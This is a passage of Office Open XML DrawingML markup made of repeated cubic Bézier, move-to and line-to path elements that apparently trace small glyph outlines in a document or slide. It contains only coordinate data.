                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="71"/>
                  <a:pt x="33" y="71"/>
                  <a:pt x="32" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="69"/>
                  <a:pt x="32" y="69"/>
                  <a:pt x="32" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="69"/>
                  <a:pt x="32" y="69"/>
                  <a:pt x="32" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="72"/>
                  <a:pt x="30" y="72"/>
                  <a:pt x="30" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="72"/>
                  <a:pt x="30" y="72"/>
                  <a:pt x="30" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="31" y="71"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="70"/>
                  <a:pt x="32" y="70"/>
                  <a:pt x="32" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="71"/>
                  <a:pt x="32" y="71"/>
                  <a:pt x="32" y="71"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31" y="71"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="40" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="73"/>
                  <a:pt x="40" y="73"/>
                  <a:pt x="40" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="73"/>
                  <a:pt x="41" y="73"/>
                  <a:pt x="41" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="72"/>
                  <a:pt x="42" y="72"/>
                  <a:pt x="42" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="71"/>
                  <a:pt x="42" y="71"/>
                  <a:pt x="42" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="70"/>
                  <a:pt x="42" y="70"/>
                  <a:pt x="42" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="69"/>
                  <a:pt x="41" y="69"/>
                  <a:pt x="41" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="69"/>
                  <a:pt x="41" y="69"/>
                  <a:pt x="40" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="69"/>
                  <a:pt x="40" y="69"/>
                  <a:pt x="39" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="70"/>
                  <a:pt x="39" y="70"/>
                  <a:pt x="39" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="71"/>
                  <a:pt x="39" y="71"/>
                  <a:pt x="39" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="72"/>
                  <a:pt x="39" y="72"/>
                  <a:pt x="39" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="73"/>
                  <a:pt x="40" y="73"/>
                  <a:pt x="40" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="40" y="71"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="70"/>
                  <a:pt x="40" y="70"/>
                  <a:pt x="40" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="70"/>
                  <a:pt x="40" y="69"/>
                  <a:pt x="40" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="69"/>
                  <a:pt x="41" y="70"/>
                  <a:pt x="41" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="70"/>
                  <a:pt x="41" y="70"/>
                  <a:pt x="41" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="71"/>
                  <a:pt x="41" y="71"/>
                  <a:pt x="41" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="72"/>
                  <a:pt x="41" y="72"/>
                  <a:pt x="41" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="72"/>
                  <a:pt x="41" y="72"/>
                  <a:pt x="40" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="72"/>
                  <a:pt x="40" y="72"/>
                  <a:pt x="40" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="72"/>
                  <a:pt x="40" y="72"/>
                  <a:pt x="40" y="71"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="43" y="70"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="69"/>
                  <a:pt x="43" y="69"/>
                  <a:pt x="43" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="69"/>
                  <a:pt x="43" y="69"/>
                  <a:pt x="43" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="69"/>
                  <a:pt x="45" y="69"/>
                  <a:pt x="45" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="72"/>
                  <a:pt x="45" y="72"/>
                  <a:pt x="45" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="72"/>
                  <a:pt x="45" y="72"/>
                  <a:pt x="45" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="72"/>
                  <a:pt x="45" y="72"/>
                  <a:pt x="46" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="72"/>
                  <a:pt x="46" y="73"/>
                  <a:pt x="46" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="73"/>
                  <a:pt x="46" y="73"/>
                  <a:pt x="46" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="73"/>
                  <a:pt x="45" y="73"/>
                  <a:pt x="45" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="72"/>
                  <a:pt x="43" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="72"/>
                  <a:pt x="43" y="72"/>
                  <a:pt x="43" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="72"/>
                  <a:pt x="44" y="72"/>
                  <a:pt x="44" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="70"/>
                  <a:pt x="44" y="70"/>
                  <a:pt x="44" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                  <a:pt x="43" y="70"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="73"/>
                  <a:pt x="46" y="73"/>
                  <a:pt x="46" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="72"/>
                  <a:pt x="46" y="72"/>
                  <a:pt x="46" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="71"/>
                  <a:pt x="48" y="71"/>
                  <a:pt x="49" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="70"/>
                  <a:pt x="48" y="69"/>
                  <a:pt x="48" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="69"/>
                  <a:pt x="48" y="70"/>
                  <a:pt x="47" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="70"/>
                  <a:pt x="47" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="69"/>
                  <a:pt x="47" y="69"/>
                  <a:pt x="47" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="69"/>
                  <a:pt x="48" y="69"/>
                  <a:pt x="48" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="69"/>
                  <a:pt x="49" y="69"/>
                  <a:pt x="49" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="69"/>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="70"/>
                  <a:pt x="49" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="49" y="71"/>
                  <a:pt x="49" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="48" y="72"/>
                  <a:pt x="47" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="72"/>
                  <a:pt x="49" y="73"/>
                  <a:pt x="49" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="51" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="73"/>
                  <a:pt x="50" y="73"/>
                  <a:pt x="50" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="72"/>
                  <a:pt x="50" y="72"/>
                  <a:pt x="50" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="72"/>
                  <a:pt x="51" y="72"/>
                  <a:pt x="51" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="72"/>
                  <a:pt x="51" y="72"/>
                  <a:pt x="51" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="72"/>
                  <a:pt x="51" y="72"/>
                  <a:pt x="51" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="72"/>
                  <a:pt x="52" y="72"/>
                  <a:pt x="52" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="72"/>
                  <a:pt x="52" y="72"/>
                  <a:pt x="53" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="72"/>
                  <a:pt x="53" y="72"/>
                  <a:pt x="53" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="71"/>
                  <a:pt x="53" y="71"/>
                  <a:pt x="53" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="71"/>
                  <a:pt x="52" y="71"/>
                  <a:pt x="52" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="71"/>
                  <a:pt x="52" y="71"/>
                  <a:pt x="51" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="71"/>
                  <a:pt x="51" y="71"/>
                  <a:pt x="51" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="71"/>
                  <a:pt x="51" y="71"/>
                  <a:pt x="51" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="71"/>
                  <a:pt x="51" y="71"/>
                  <a:pt x="51" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="69"/>
                  <a:pt x="51" y="69"/>
                  <a:pt x="51" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                  <a:pt x="53" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="70"/>
                  <a:pt x="53" y="70"/>
                  <a:pt x="53" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="70"/>
                  <a:pt x="51" y="70"/>
                  <a:pt x="51" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="70"/>
                  <a:pt x="51" y="70"/>
                  <a:pt x="51" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="70"/>
                  <a:pt x="52" y="70"/>
                  <a:pt x="52" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="70"/>
                  <a:pt x="53" y="70"/>
                  <a:pt x="53" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="71"/>
                  <a:pt x="53" y="71"/>
                  <a:pt x="53" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="72"/>
                  <a:pt x="53" y="72"/>
                  <a:pt x="53" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="73"/>
                  <a:pt x="52" y="73"/>
                  <a:pt x="52" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="73"/>
                  <a:pt x="51" y="73"/>
                  <a:pt x="51" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="60" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="73"/>
                  <a:pt x="60" y="73"/>
                  <a:pt x="60" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="73"/>
                  <a:pt x="61" y="73"/>
                  <a:pt x="61" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="72"/>
                  <a:pt x="62" y="72"/>
                  <a:pt x="62" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="71"/>
                  <a:pt x="62" y="71"/>
                  <a:pt x="61" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="70"/>
                  <a:pt x="61" y="70"/>
                  <a:pt x="60" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="71"/>
                  <a:pt x="60" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="70"/>
                  <a:pt x="60" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="70"/>
                  <a:pt x="61" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="70"/>
                  <a:pt x="62" y="69"/>
                  <a:pt x="62" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="69"/>
                  <a:pt x="62" y="69"/>
                  <a:pt x="62" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="69"/>
                  <a:pt x="62" y="69"/>
                  <a:pt x="62" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="69"/>
                  <a:pt x="61" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="69"/>
                  <a:pt x="60" y="69"/>
                  <a:pt x="60" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="69"/>
                  <a:pt x="59" y="69"/>
                  <a:pt x="59" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="70"/>
                  <a:pt x="59" y="70"/>
                  <a:pt x="59" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="71"/>
                  <a:pt x="59" y="72"/>
                  <a:pt x="59" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="72"/>
                  <a:pt x="59" y="73"/>
                  <a:pt x="60" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="60" y="71"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="71"/>
                  <a:pt x="60" y="71"/>
                  <a:pt x="60" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="71"/>
                  <a:pt x="61" y="71"/>
                  <a:pt x="61" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="71"/>
                  <a:pt x="61" y="72"/>
                  <a:pt x="61" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="72"/>
                  <a:pt x="61" y="72"/>
                  <a:pt x="61" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="72"/>
                  <a:pt x="61" y="72"/>
                  <a:pt x="60" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="72"/>
                  <a:pt x="60" y="72"/>
                  <a:pt x="60" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="72"/>
                  <a:pt x="60" y="72"/>
                  <a:pt x="60" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="71"/>
                  <a:pt x="60" y="71"/>
                  <a:pt x="60" y="71"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="63" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="73"/>
                  <a:pt x="64" y="73"/>
                  <a:pt x="64" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="73"/>
                  <a:pt x="65" y="73"/>
                  <a:pt x="65" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="72"/>
                  <a:pt x="66" y="72"/>
                  <a:pt x="66" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="71"/>
                  <a:pt x="65" y="71"/>
                  <a:pt x="65" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="70"/>
                  <a:pt x="65" y="70"/>
                  <a:pt x="64" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="70"/>
                  <a:pt x="64" y="70"/>
                  <a:pt x="64" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="70"/>
                  <a:pt x="64" y="71"/>
                  <a:pt x="63" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="70"/>
                  <a:pt x="64" y="70"/>
                  <a:pt x="64" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="70"/>
                  <a:pt x="64" y="70"/>
                  <a:pt x="64" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="69"/>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="70"/>
                  <a:pt x="65" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="70"/>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="69"/>
                  <a:pt x="66" y="69"/>
                  <a:pt x="66" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="69"/>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                  <a:pt x="65" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="69"/>
                  <a:pt x="64" y="69"/>
                  <a:pt x="64" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="69"/>
                  <a:pt x="63" y="69"/>
                  <a:pt x="63" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="70"/>
                  <a:pt x="63" y="70"/>
                  <a:pt x="63" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="71"/>
                  <a:pt x="63" y="72"/>
                  <a:pt x="63" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="72"/>
                  <a:pt x="63" y="73"/>
                  <a:pt x="63" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="64" y="71"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="71"/>
                  <a:pt x="64" y="71"/>
                  <a:pt x="64" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="71"/>
                  <a:pt x="65" y="71"/>
                  <a:pt x="65" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="71"/>
                  <a:pt x="65" y="72"/>
                  <a:pt x="65" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="72"/>
                  <a:pt x="65" y="72"/>
                  <a:pt x="65" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="72"/>
                  <a:pt x="64" y="72"/>
                  <a:pt x="64" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="72"/>
                  <a:pt x="64" y="72"/>
                  <a:pt x="64" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="72"/>
                  <a:pt x="64" y="72"/>
                  <a:pt x="63" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="71"/>
                  <a:pt x="64" y="71"/>
                  <a:pt x="64" y="71"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="69" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="73"/>
                  <a:pt x="66" y="73"/>
                  <a:pt x="66" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="72"/>
                  <a:pt x="66" y="72"/>
                  <a:pt x="66" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="71"/>
                  <a:pt x="68" y="71"/>
                  <a:pt x="68" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="70"/>
                  <a:pt x="68" y="70"/>
                  <a:pt x="68" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="70"/>
                  <a:pt x="68" y="70"/>
                  <a:pt x="68" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="67" y="69"/>
                  <a:pt x="67" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="70"/>
                  <a:pt x="67" y="70"/>
                  <a:pt x="66" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="70"/>
                  <a:pt x="66" y="70"/>
                  <a:pt x="66" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="70"/>
                  <a:pt x="66" y="70"/>
                  <a:pt x="67" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="69"/>
                  <a:pt x="67" y="69"/>
                  <a:pt x="67" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="69" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="69"/>
                  <a:pt x="69" y="70"/>
                  <a:pt x="69" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="70"/>
                  <a:pt x="69" y="70"/>
                  <a:pt x="69" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="71"/>
                  <a:pt x="69" y="71"/>
                  <a:pt x="68" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="71"/>
                  <a:pt x="68" y="72"/>
                  <a:pt x="67" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="72"/>
